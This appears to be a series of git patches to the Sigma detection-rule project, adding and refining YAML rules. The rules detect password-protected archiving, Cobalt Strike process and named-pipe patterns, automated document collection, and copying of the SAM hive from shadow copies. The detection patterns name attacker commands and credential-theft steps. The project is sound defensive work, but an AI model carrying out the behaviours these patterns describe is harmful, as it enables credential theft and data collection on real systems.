https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md +tags: + - attack.collection + - attack.t1560.001 +logsource: + category: process_creation + product: windows +detection: + selection_winzip: + CommandLine|contains: + - 'winzip.exe' + - 'winzip64.exe' + selection_password: + CommandLine|contains: + - '-s"' + selection_other: + CommandLine|contains: + - ' -min ' + - ' -a ' + condition: all of them +falsepositives: + - Unknown +level: medium From ea56db2bed0501319c61361b2e92c20f76fbfa7f Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 11:09:35 +0200 Subject: [PATCH 0121/1367] forget date field --- rules/windows/process_creation/process_creation_susp_winzip.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_susp_winzip.yml b/rules/windows/process_creation/process_creation_susp_winzip.yml index da7d2a78..2e668c63 100644 --- a/rules/windows/process_creation/process_creation_susp_winzip.yml +++ b/rules/windows/process_creation/process_creation_susp_winzip.yml @@ -2,7 +2,7 @@ title: Compress Data and Lock With Password for Exfiltration With WINZIP id: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d status: experimental author: frack113 -date: +date: 2021/07/27 description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md From 5d039dd138fa22800b7c70282c24b0ba64a0b3f7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 11:24:40 +0200 Subject: [PATCH 0122/1367] rule: Cobalt Strike patterns --- .../win_cobaltstrike_process_patterns.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/process_creation/win_cobaltstrike_process_patterns.yml diff --git a/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml new file mode 100644 index 00000000..0923753e --- /dev/null +++ b/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml @@ -0,0 +1,34 @@ +title: CobaltStrike Process Patterns +id: f35c5d71-b489-4e22-a115-f003df287317 +status: experimental +description: Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) +author: Florian Roth +references: + - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ +date: 2021/07/27 +tags: + - attack.execution +logsource: + category: process_creation + product: windows +detection: + selection1: + CommandLine|contains: '\cmd.exe /C whoami' + ParentImage|startswith: 'C:\Temp' + selection2: + CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' + ParentCommandLine|contains: + - '/C whoami' + - 'cmd.exe /C echo' + - ' > \\.\pipe' + selection3: + CommandLine|contains: + - 'cmd.exe /c echo' + - '> \\.\pipe' + - '\whoami.exe' + ParentImage|endswith: '\dllhost.exe' + condition: 1 of them +falsepositives: + - Other programs that cause these patterns (please report) +level: high + From 54e6e36ecc79017d390adcdbee6895ca0a12148c Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 12:54:39 +0200 Subject: [PATCH 0123/1367] add process_creation_susp_7z.yml --- .../process_creation_susp_7z.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_susp_7z.yml diff --git a/rules/windows/process_creation/process_creation_susp_7z.yml b/rules/windows/process_creation/process_creation_susp_7z.yml new file mode 100644 index 00000000..dc653cfe --- /dev/null +++ b/rules/windows/process_creation/process_creation_susp_7z.yml @@ -0,0 +1,33 @@ +title: Compress Data and Lock With Password for Exfiltration With 7-ZIP +id: 9fbf5927-5261-4284-a71d-f681029ea574 +status: experimental +author: frack113 +date: 2021/07/27 +description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md +tags: + - attack.collection + - attack.t1560.001 +logsource: + category: process_creation + product: windows +detection: + selection_7z: + CommandLine|contains: + - '7z.exe' + selection_password: + CommandLine|contains: + - ' -p' + selection_action: + CommandLine|contains: + - ' a ' + - ' u ' + condition: all of them +falsepositives: + - Unknown +level: medium +fields: + - CommandLine + - ParentCommandLine + - CurrentDirectory \ No newline at end of file From c31bc05aae0a5b6d7750c757d8fbd294b6355092 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 15:22:44 +0200 Subject: [PATCH 0124/1367] Update process_creation_susp_7z.yml --- .../process_creation/process_creation_susp_7z.yml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/process_creation_susp_7z.yml b/rules/windows/process_creation/process_creation_susp_7z.yml index dc653cfe..5f2ebc54 100644 --- a/rules/windows/process_creation/process_creation_susp_7z.yml +++ b/rules/windows/process_creation/process_creation_susp_7z.yml @@ -14,20 +14,19 @@ logsource: product: windows detection: selection_7z: - CommandLine|contains: + Image|endswith: - '7z.exe' - selection_password: - CommandLine|contains: + - '7za.exe' + selection_param: + CommandLine|contains|all: - ' -p' - selection_action: - CommandLine|contains: - ' a ' - ' u ' - condition: all of them + condition: selection_7z and selection_param falsepositives: - - Unknown + - Command line parameter combinations that contain all included strings level: medium fields: - CommandLine - ParentCommandLine - - CurrentDirectory \ No newline at end of file + - CurrentDirectory From 428995d00e35b45aa2767ba0d0c1e614009d12f0 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 15:24:39 +0200 Subject: [PATCH 0125/1367] Update process_creation_susp_7z.yml --- .../process_creation/process_creation_susp_7z.yml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/rules/windows/process_creation/process_creation_susp_7z.yml b/rules/windows/process_creation/process_creation_susp_7z.yml index 5f2ebc54..c9042a04 100644 --- a/rules/windows/process_creation/process_creation_susp_7z.yml +++ b/rules/windows/process_creation/process_creation_susp_7z.yml @@ -15,14 +15,15 @@ logsource: detection: selection_7z: Image|endswith: - - '7z.exe' - - '7za.exe' - selection_param: - CommandLine|contains|all: - - ' -p' + - '\7z.exe' + - '\7za.exe' + selection_password: + CommandLine|contains: ' -p' + selection_action: + CommandLine|contains: - ' a ' - ' u ' - condition: selection_7z and selection_param + condition: all of them falsepositives: - Command line parameter combinations that contain all included strings level: medium From 87a911a15e3996d525693e96cbd3f1869b3617b3 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 16:02:09 +0200 Subject: [PATCH 0126/1367] Update process_creation_susp_7z.yml --- rules/windows/process_creation/process_creation_susp_7z.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/process_creation_susp_7z.yml b/rules/windows/process_creation/process_creation_susp_7z.yml index c9042a04..8a852dc0 100644 --- a/rules/windows/process_creation/process_creation_susp_7z.yml +++ b/rules/windows/process_creation/process_creation_susp_7z.yml @@ -14,9 +14,9 @@ logsource: product: windows detection: selection_7z: - Image|endswith: - - '\7z.exe' - - '\7za.exe' + CommandLine|contains: + - '7z.exe' + - '7za.exe' selection_password: CommandLine|contains: ' -p' selection_action: From 6b076d43607d31ed838e190417c7f828950cd010 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 19:14:00 +0200 Subject: [PATCH 0127/1367] Add test_optional_author --- .../process_creation/sysmon_apt_sourgrum.yml | 4 +--- .../win_process_creation_bitsadmin_download.yml | 4 +--- tests/test_rules.py | 13 +++++++++++++ 3 files changed, 15 insertions(+), 6 deletions(-) diff --git a/rules/windows/process_creation/sysmon_apt_sourgrum.yml b/rules/windows/process_creation/sysmon_apt_sourgrum.yml index 8ea9ea53..1a6c50cd 100644 --- a/rules/windows/process_creation/sysmon_apt_sourgrum.yml +++ b/rules/windows/process_creation/sysmon_apt_sourgrum.yml @@ -1,9 +1,7 @@ title: SOURGUM Actor Behaviours id: 7ba08e95-1e0b-40cd-9db5-b980555e42fd description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM -author: - - MSTIC - - FPT.EagleEye +author: MSTIC, FPT.EagleEye status: experimental level: high references: diff --git a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml index f6c8a5fb..508bc93c 100644 --- a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml +++ b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml @@ -14,9 +14,7 @@ tags: - attack.t1036.003 date: 2017/03/09 modified: 2021/07/16 -author: - - Michael Haag - - FPT.EagleEye +author: Michael Haag, FPT.EagleEye logsource: category: process_creation product: windows diff --git a/tests/test_rules.py b/tests/test_rules.py index cc8a9dab..c5fe28c6 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -397,6 +397,19 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed optional 'falsepositives' fields. (has to be a list of values even if it contains only a single value)") + def test_optional_author(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + author_str = self.get_rule_part(file_path=file, part_name="author") + if author_str: + # it exists but isn't a string + if not isinstance(author_str, str): + print(Fore.YELLOW + "Rule {} has a 'author' field that isn't a string.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed optional 'author' fields. (has to be a string even if it contains many author)") + def test_references(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): From 5818a0debe99f8c3f7fe1f2ab54e326dc3c5d4f2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 27 Jul 2021 17:14:28 -0500 Subject: [PATCH 0128/1367] Update aws_elasticache_security_group_modified_or_deleted.yml --- ...che_security_group_modified_or_deleted.yml | 22 ++++++++----------- 1 file changed, 9 insertions(+), 13 deletions(-) diff --git a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml index eab2a71a..26e32527 100644 --- a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml +++ b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml @@ -9,19 +9,15 @@ references: logsource: service: cloudtrail detection: - selection_source: - - eventSource: elasticache.amazonaws.com - selection_eventname1: - - eventName: "Delete Cache Security Group" - selection_eventname2: - - eventName: "Authorize Cache Security Group Ingress" - selection_eventname3: - - eventName: "Revoke Cache Security Group Ingress" - selection_eventname4: - - eventName: "AuthorizeCacheSecurityGroupEgress" - selection_eventname5: - - eventName: "RevokeCacheSecurityGroupEgress" - condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 + selection: + eventSource: elasticache.amazonaws.com + eventName: + - "Delete Cache Security Group" + - "Authorize Cache Security Group Ingress" + - "Revoke Cache Security Group Ingress" + - "AuthorizeCacheSecurityGroupEgress" + - "RevokeCacheSecurityGroupEgress" + condition: selection level: low tags: - attack.impact From 8a885dd0982f61f7f07af91b456493405efb9ff5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 28 Jul 2021 13:17:40 +0200 Subject: [PATCH 0129/1367] add process_creation_automated_collection.yml --- .../process_creation_automated_collection.yml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_automated_collection.yml diff --git a/rules/windows/process_creation/process_creation_automated_collection.yml b/rules/windows/process_creation/process_creation_automated_collection.yml new file mode 100644 index 00000000..ab979f73 --- /dev/null +++ b/rules/windows/process_creation/process_creation_automated_collection.yml @@ -0,0 +1,38 @@ +title: Automated Collection Command Prompt +id: f576a613-2392-4067-9d1a-9345fb58d8d1 +status: experimental +author: frack113 +date: 2021/07/28 +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md +tags: + - attack.collection + - attack.t1119 +logsource: + category: process_creation + product: windows +detection: + selection_ext: + CommandLine|contains: + - '.doc' + - '.docx' + - '.xls' + - '.xlsx' + - '.ppt' + - '.pptx' + - '.rtf' + - '.pdf' + - '.txt' + selection_dir: + CommandLine|contains|all: + - 'dir ' + - ' /b ' + - ' /s ' + selection_findstr: + OriginalFileName: FINDSTR.EXE + CommandLine|contains: ' /e ' + condition: selection_ext and (selection_dir or selection_findstr) +falsepositives: + - Unknown +level: medium From 2758c1aa934c70118f099955c33a1219ed4160b0 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 28 Jul 2021 14:14:02 +0200 Subject: [PATCH 0130/1367] add powershell_automated_collection.yml --- .../powershell_automated_collection.yml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 rules/windows/powershell/powershell_automated_collection.yml diff --git a/rules/windows/powershell/powershell_automated_collection.yml b/rules/windows/powershell/powershell_automated_collection.yml new file mode 100644 index 00000000..b3e00512 --- /dev/null +++ b/rules/windows/powershell/powershell_automated_collection.yml @@ -0,0 +1,39 @@ +title: Automated Collection Command PowerShell +id: c1dda054-d638-4c16-afc8-53e007f3fbc5 +status: experimental +author: frack113 +date: 2021/07/28 +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md +tags: + - attack.collection + - attack.t1119 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection_eventid: + EventID: 4104 + selection_ext: + ScriptBlockText|contains: + - '.doc' + - '.docx' + - '.xls' + - '.xlsx' + - '.ppt' + - '.pptx' + - '.rtf' + - '.pdf' + - '.txt' + selection_cmd: + ScriptBlockText|contains|all: + - 'Get-ChildItem' + - ' -Recurse ' + - ' -Include ' + + condition: all of them +falsepositives: + - Unknown +level: medium From aefd50f049e72ee8f2b82bbe03a7b4eb09daba41 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 28 Jul 2021 14:23:54 +0200 Subject: [PATCH 0131/1367] fix: avoid FPs with HTool string --- rules/windows/builtin/win_av_relevant_match.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/win_av_relevant_match.yml b/rules/windows/builtin/win_av_relevant_match.yml index cbf84be0..6c1d18d5 100644 --- a/rules/windows/builtin/win_av_relevant_match.yml +++ b/rules/windows/builtin/win_av_relevant_match.yml @@ -3,14 +3,14 @@ id: 78bc5783-81d9-4d73-ac97-59f6db4f72a8 description: This detection method points out highly relevant Antivirus events author: Florian Roth date: 2017/02/19 -modified: 2021/01/07 +modified: 2021/07/28 logsource: product: windows service: application detection: keywords: Message|contains: - - "HTool" + - "HTool-" - "Hacktool" - "ASP/Backdoor" - "JSP/Backdoor" From 2866a1dbdc64c0182afd79590417e5d6b2cbe988 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 28 Jul 2021 15:13:55 +0200 Subject: [PATCH 0132/1367] fix: change howto to match current state of code --- tests/test_rules.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index cc8a9dab..8f7cb15c 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -3,7 +3,7 @@ Checks for noncompliance or common errors on all rules Run using the command -# python -m unittest test_rules.py +# python test_rules.py """ import os From 9833cc34e5842757bc95c566f48ad1b04c072fe4 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 28 Jul 2021 15:14:30 +0200 Subject: [PATCH 0133/1367] direct syscall to NtOpenProcess --- .../sysmon_direct_syscall_ntopenprocess.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100755 rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml diff --git a/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml new file mode 100755 index 00000000..05865dff --- /dev/null +++ b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml @@ -0,0 +1,22 @@ +title: Direct Syscall of NtOpenProcess +id: 3f3f3506-1895-401b-9cc3-e86b16e630d0 +description: Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF. +references: + - https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6 +status: experimental +author: Christian Burkard +date: 2021/07/28 +logsource: + category: process_access + product: windows +detection: + selection: + CallTrace|startswith: + - 'UNKNOWN' + condition: selection +falsepositives: + - unkown +level: critical +tags: + - attack.execution + - attack.t1106 From 46da416ad1310929dc0937dcc92ddf1e4fd5d01b Mon Sep 17 00:00:00 2001 From: Wietze Date: Wed, 28 Jul 2021 14:43:51 +0100 Subject: [PATCH 0134/1367] Fixing exception caused by incorrect type of passed 'path' parameter --- tools/sigma/config/collection.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/config/collection.py b/tools/sigma/config/collection.py index cced47b2..cf870557 100644 --- a/tools/sigma/config/collection.py +++ b/tools/sigma/config/collection.py @@ -51,7 +51,7 @@ class SigmaConfigurationManager(object): if path.exists() ] elif isinstance(paths, Iterable) and all([type(path) is str for path in paths]): - self.paths = paths + self.paths = [Path(path) for path in paths] else: raise TypeError("None or iterable of strings expected as paths") From 7f820c7b29e70c29259cfe805cabaf7827c71944 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 28 Jul 2021 16:20:21 +0200 Subject: [PATCH 0135/1367] rule updates --- rules/proxy/proxy_ua_malware.yml | 1 + .../win_registry_mimikatz_printernightmare.yml | 13 +++++++++++-- 2 files changed, 12 insertions(+), 2 deletions(-) diff --git a/rules/proxy/proxy_ua_malware.yml b/rules/proxy/proxy_ua_malware.yml index 3d0ce0d7..45a433e7 100644 --- a/rules/proxy/proxy_ua_malware.yml +++ b/rules/proxy/proxy_ua_malware.yml @@ -71,6 +71,7 @@ detection: - 'agent *' - 'AutoIt' # Suspicious - base-lining recommended - 'IczelionDownLoad' + - 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # https://unit42.paloaltonetworks.com/thor-plugx-variant/ condition: selection fields: - ClientIP diff --git a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml index 076b0241..44c2e943 100644 --- a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml +++ b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml @@ -12,7 +12,7 @@ tags: - cve.2021-1675 - cve.2021-34527 date: 2021/07/04 -modified: 2021/07/08 +modified: 2021/07/28 logsource: product: windows category: registry_event @@ -25,7 +25,16 @@ detection: TargetObject|contains|all: - 'legitprinter' - '\Control\Print\Environments\Windows' - condition: selection or selection_alt + selection_print: + TargetObject|contains: + - '\Control\Print\Environments' + - '\CurrentVersion\Print\Printers' + selection_kiwi: + TargetObject|contains: + - 'Gentil Kiwi' + - 'mimikatz printer' + - 'Kiwi Legit Printer' + condition: selection or selection_alt or (selection_print and selection_kiwi) falsepositives: - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely) level: critical \ No newline at end of file From bd123536dfa3b646c8af8106e61b357adce28e31 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 28 Jul 2021 18:19:23 +0200 Subject: [PATCH 0136/1367] fix duplicate UUID --- rules/cloud/aws_sts_assumedrole_misuse.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws_sts_assumedrole_misuse.yml index 869c4f2d..75ecc209 100644 --- a/rules/cloud/aws_sts_assumedrole_misuse.yml +++ b/rules/cloud/aws_sts_assumedrole_misuse.yml @@ -1,5 +1,5 @@ title: AWS STS AssumedRole Misuse -id: b45ab1d2-712f-4f01-a751-df3826969807 +id: 905d389b-b853-46d0-9d3d-dea0d3a3cd49 description: Identifies the suspicious use of AssumedRole. Attackers could move laterally and escalate privileges. author: Austin Songer status: experimental From e0d6856987e2c8f8e7b8373687c350c6329fe42d Mon Sep 17 00:00:00 2001 From: Wietze Date: Thu, 29 Jul 2021 13:57:58 +0100 Subject: [PATCH 0137/1367] [CarbonBlack] Adding extra escape character Hyphens, especially when at the start of a query, need escaping since hyphens are also used to negate conditions --- tools/sigma/backends/carbonblack.py | 1 + 1 file changed, 1 insertion(+) diff --git a/tools/sigma/backends/carbonblack.py b/tools/sigma/backends/carbonblack.py index 1a147629..cf517577 100644 --- a/tools/sigma/backends/carbonblack.py +++ b/tools/sigma/backends/carbonblack.py @@ -81,6 +81,7 @@ class CarbonBlackQueryBackend(CarbonBlackWildcardHandlingMixin, SingleTextQueryB '|', ';', ':', + '-' ] def __init__(self, *args, **kwargs): From 687631ee202351260f1f46485f7fdae5837cfca3 Mon Sep 17 00:00:00 2001 From: Wietze Date: Wed, 28 Jul 2021 17:24:26 +0100 Subject: [PATCH 0138/1367] Several updates to CarbonBlack EEDR config --- tools/config/carbon-black-eedr.yml | 54 +++++++----------------------- 1 file changed, 13 insertions(+), 41 deletions(-) diff --git a/tools/config/carbon-black-eedr.yml b/tools/config/carbon-black-eedr.yml index dbdd9a21..0e7c4fff 100644 --- a/tools/config/carbon-black-eedr.yml +++ b/tools/config/carbon-black-eedr.yml @@ -16,68 +16,56 @@ fieldmappings: - process_product_version - process_publisher - process_file_description - DestPort: - - netconn_port - - netconn_remote_port + DestPort: netconn_port Destination: - netconn_domain DestinationAddress: - netconn_domain - netconn_ipv4 - netconn_ipv6 - - netconn_remote_ipv4 - - netconn_remote_ipv6 - DestinationHostname: + DestinationHostname: - netconn_domain - netconn_proxy_domain DestinationIp: - netconn_ipv4 - netconn_ipv6 - - netconn_remote_ipv4 - - netconn_remote_ipv6 - DestinationPort: - - netconn_port - - netconn_remote_port + DestinationPort: netconn_port Device: device_name FileName: - - process_internal_name - process_name - process_original_filename FileVersion: process_product_version Image: - process_name - - process_internal_name IntegrityLevel: process_integrity_level IpAddress: - netconn_ipv4 - netconn_ipv6 - netconn_local_ipv4 - netconn_local_ipv6 - - netconn_remote_ipv4 - - netconn_remote_ipv6 LogonId: - childproc_username - process_username md5: hash - NewName: regmod_new_name + NewName: regmod_name OriginalFileName: process_original_filename ParentCommandLine: parent_cmdline ParentImage: parent_name ParentIntegrityLevel: process_integrity_level ProcessCommandLine: process_cmdline ProcessName: process_name - Product: + Product: - process_product_name - process_file_description RelativeTargetName: childproc_name - ScriptBlockText: + ScriptBlockText: - childproc_cmdline - crossproc_cmdline - process_cmdline ServiceFileName: process_service_name ServiceName: process_service_name sha256: hash - Signature: + Signature: - childproc_publisher - filemod_publisher - modload_publisher @@ -98,27 +86,17 @@ fieldmappings: - netconn_local_port - netconn_port SourceWorkstation: device_name - TargetFilename: - - filemod_name - - crossproc_name - TargetImage: - - filemod_name - - crossproc_name - TargetName: - - filemod_name - - crossproc_name + TargetFilename: filemod_name + TargetImage: filemod_name + TargetName: filemod_name TargetUserName: - childproc_username - process_username - TargetObject: - - regmod_name - - regmod_new_name + TargetObject: regmod_name User: - childproc_username - process_username - Value: - - regmod_name - - regmod_new_name + Value: regmod_name Workstation: device_name WorkstationName: device_name @@ -127,15 +105,9 @@ fieldmappings: - netconn_ipv6 - netconn_local_ipv4 - netconn_local_ipv6 - - netconn_remote_ipv4 - - netconn_remote_ipv6 - dst_port: - - netconn_port - - netconn_remote_port + dst_port: netconn_port src_ip: - netconn_ipv4 - netconn_ipv6 - netconn_local_ipv4 - netconn_local_ipv6 - - netconn_remote_ipv4 - - netconn_remote_ipv6 \ No newline at end of file From d753d9a7fd4d673f85e95527c80ad0bd2404a0f4 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 29 Jul 2021 16:06:45 +0200 Subject: [PATCH 0139/1367] fix: duplicate id and indentation --- rules/cloud/aws_sts_assumedrole_misuse.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/rules/cloud/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws_sts_assumedrole_misuse.yml index 869c4f2d..a4b2c5b9 100644 --- a/rules/cloud/aws_sts_assumedrole_misuse.yml +++ b/rules/cloud/aws_sts_assumedrole_misuse.yml @@ -1,5 +1,5 @@ title: AWS STS AssumedRole Misuse -id: b45ab1d2-712f-4f01-a751-df3826969807 +id: 216e11fa-2796-4fb0-8416-8910b63faec4 description: Identifies the suspicious use of AssumedRole. Attackers could move laterally and escalate privileges. author: Austin Songer status: experimental @@ -17,11 +17,11 @@ detection: condition: selection level: low tags: - - attack.lateral_movement - - attack.privilege_escalation - - attack.t1548 - - attack.t1550 - - attack.t1550.001 + - attack.lateral_movement + - attack.privilege_escalation + - attack.t1548 + - attack.t1550 + - attack.t1550.001 falsepositives: -- AssumedRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumedRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. -- Automated processes that uses Terraform may lead to false positives. + - AssumedRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumedRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Automated processes that uses Terraform may lead to false positives. From ec9c15226fc94714c8f9ded058b0280ca220956c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 29 Jul 2021 18:12:10 +0200 Subject: [PATCH 0140/1367] SeriousSAM PowerShell rule --- .../win_susp_powershell_sam_access.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_powershell_sam_access.yml diff --git a/rules/windows/process_creation/win_susp_powershell_sam_access.yml b/rules/windows/process_creation/win_susp_powershell_sam_access.yml new file mode 100644 index 00000000..2b0b1ccd --- /dev/null +++ b/rules/windows/process_creation/win_susp_powershell_sam_access.yml @@ -0,0 +1,31 @@ +title: PowerShell SAM Copy +id: 1af57a4b-460a-4738-9034-db68b880c665 +description: Detects suspicious PowerShell scripts accessing SAM hives +status: experimental +references: + - https://twitter.com/splinter_code/status/1420546784250769408 +author: Florian Roth +date: 2021/07/29 +tags: + - attack.credential_access + - attack.t1003.002 +logsource: + category: process_creation + product: windows +detection: + selection_1: + CommandLine|contains|all: + - '\HarddiskVolumeShadowCopy' + - 'ystem32\config\sam' + selection_2: + CommandLine|contains: + - 'Copy-Item' + - 'cp $_.' + - 'cpi $_.' + - 'copy $_.' + - '.File]::Copy(' + condition: all of them +falsepositives: + - Some rare backup scenarios + - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs +level: high From 0cbb6f82ad1438f212d5e2062a0b3773a050c916 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 07:11:11 +0200 Subject: [PATCH 0141/1367] CobaltStrike NamedPipe Patterns https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 --- .../sysmon_mal_cobaltstrike_re.yml | 36 +++++++++++++++++++ ...sysmon_susp_cobaltstrike_pipe_patterns.yml | 29 +++++++++++++++ 2 files changed, 65 insertions(+) create mode 100644 rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml create mode 100644 rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml new file mode 100644 index 00000000..1d4cb892 --- /dev/null +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -0,0 +1,36 @@ +title: CobaltStrike Named Pipe Pattern Regex +id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a +status: experimental +description: Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles +references: + - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 +date: 2021/07/30 +author: Florian Roth +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 +logsource: + product: windows + category: pipe_created + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' +detection: + selection_re: + PipeName|re: + - '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}' + - '\\mojo.5688.8052.35780273329370473[0-9a-f]{2}' + - '\\wkssvc[0-9a-f]{2}' + - '\\ntsvcs[0-9a-f]{2}' + - '\\DserNamePipe[0-9a-f]{2}' + - '\\SearchTextHarvester[0-9a-f]{2}' + - '\\mypipe-f[0-9a-f]{2}' + - '\\mypipe-h[0-9a-f]{2}' + - '\\windows.update.manager[0-9a-f]{2}' + - '\\windows.update.manager[0-9a-f]{3}' + - '\\ntsvcs_[0-9a-f]{2}' + - '\\scerpc_[0-9a-f]{2}' + - '\\scerpc[0-9a-f]{2}' + condition: selection_re +falsepositives: + - Unknown +level: critical diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml new file mode 100644 index 00000000..47711bc8 --- /dev/null +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml @@ -0,0 +1,29 @@ +title: CobaltStrike Named Pipe Patterns +id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 +status: experimental +description: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles +references: + - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 +date: 2021/07/30 +author: Florian Roth +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 +logsource: + product: windows + 